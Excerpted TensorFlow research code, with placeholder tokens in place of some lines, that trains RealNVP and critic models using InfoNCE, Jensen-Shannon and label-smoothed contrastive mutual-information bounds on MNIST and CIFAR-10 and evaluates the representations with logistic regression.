apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\ndataset_train = load_data('train')\ndataset_test = load_data('test')\nx_train, y_train = tfds_to_np(dataset_train)\nx_test, y_test = tfds_to_np(dataset_test)\ntf.compat.v1.reset_default_graph()\nx_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)\nx_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)\nprint('Fit on half the pixels: {}. It should be around 0.835.'.format(\n logistic_fit(x_train_noisy[:, :DIMS // 2], y_train, x_test_noisy[:, :\n DIMS // 2], y_test)))\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()['df']\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\n 'wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl'\n )\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == 'invertible']\n",
"<import token>\n<assignment token>\nparser.add_argument('--dataset', default='mnist', type=str, help=\n 'cifar10 or mnist')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, help=\n 'mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float, help=\n 'label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs', help=\n 'directory where the results will be stored')\n<assignment token>\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n<assignment token>\nif TFDS_NAME == 'mnist':\n DIMS = 784\nelif TFDS_NAME == 'cifar10':\n DIMS = 3072\n<assignment token>\ntf.keras.backend.clear_session()\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\ntf.compat.v1.reset_default_graph()\n<assignment 